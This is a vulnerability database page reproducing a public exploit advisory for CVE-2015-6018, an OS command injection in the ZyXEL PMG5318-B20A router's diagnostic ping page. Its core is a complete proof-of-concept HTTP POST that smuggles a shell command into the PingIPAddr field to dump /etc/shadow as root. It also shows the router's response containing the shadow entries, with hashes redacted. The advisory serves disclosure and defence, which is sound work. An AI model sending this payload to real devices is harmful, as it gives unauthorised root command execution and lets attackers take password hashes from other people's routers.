Vulners
Lucene search
ZYXEL PMG5318-B20A - OS Command Injection
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | ZyXEL PMG5318-B20A - OS Command Injection Vulnerability | 14 Oct 201500:00 | – | zdt |
 | ZyXEL PMG5318-B20A diagnostic ping function input validation vulnerability | 23 Oct 201500:00 | – | cnvd |
 | CVE-2015-6018 | 31 Dec 201502:00 | – | cve |
 | CVE-2015-6018 | 31 Dec 201502:00 | – | cvelist |
 | ZYXEL PMG5318-B20A - OS Command Injection | 14 Oct 201500:00 | – | exploitpack |
 | CVE-2015-6018 | 31 Dec 201505:59 | – | nvd |
 | ZyXEL PMG5318-B20A OS Command Injection | 14 Oct 201500:00 | – | packetstorm |
 | Design/Logic Flaw | 31 Dec 201505:59 | – | prion |
 | ZyXEL NBG-418N, PMG5318-B20A and P-660HW-T1 routers contain multiple vulnerabilities | 13 Oct 201500:00 | – | cert |
# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]
# Discovered by: Karn Ganeshen
# CERT VU# 870744
# Vendor Homepage: [www.zyxel.com]
# Version Reported: [Firmware version V100AANC0b5]
# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]
*Vulnerability Details*
CWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input
Validation - CVE-2015-6018
The diagnostic ping function's PingIPAddr parameter in the ZyXEL
PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user
input. An attacker can execute arbitrary commands as root.
*OS Command Injection PoC*
The underlying services are run as 'root'. It therefore, allows dumping
system password hashes.
*HTTP Request*
POST /diagnostic/diagnostic_general.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101
Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>/diagnostic/diagnostic_general.cgi
Cookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------
-12062103314079176991367286444
Content-Length: 451
——————————————12062103314079176991367286444
Content-Disposition: form-data; name="InfoDisplay”
——————————————12062103314079176991367286444
Content-Disposition: form-data; name="*PingIPAddr*"
*8.8.8.8; cat /etc/shadow *
——————————————12062103314079176991367286444
Content-Disposition: form-data; name="Submit"
Ping
….
*HTTP Response *
.....
<snipped>
<br class="clearfloat" />
<!-- configuration beginning -->
<div class="headline"><span class="cTitle">General</span></div> <table
width="90%" border="0" align="center" cellpadding="0" cellspacing="0"
class="cfgpadding">
<tr>
<td nowrap="nowrap"><textarea name="InfoDisplay" rows="15" cols="100"
readonly="readonly”>
*root:<hash>:15986:0:99999:7:::
lp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7:::
user:<hash>:16035:0:99999:7:::*
</textarea></td>
</tr>
</table>
<table width="90%" border="0" align="center" cellpadding="0"
cellspacing="0" class="cfgpadding">
<tr>
-----------------------------12062103314079176991367286444--Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Oct 2015 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 39.8
CVSS 210
EPSS0.27364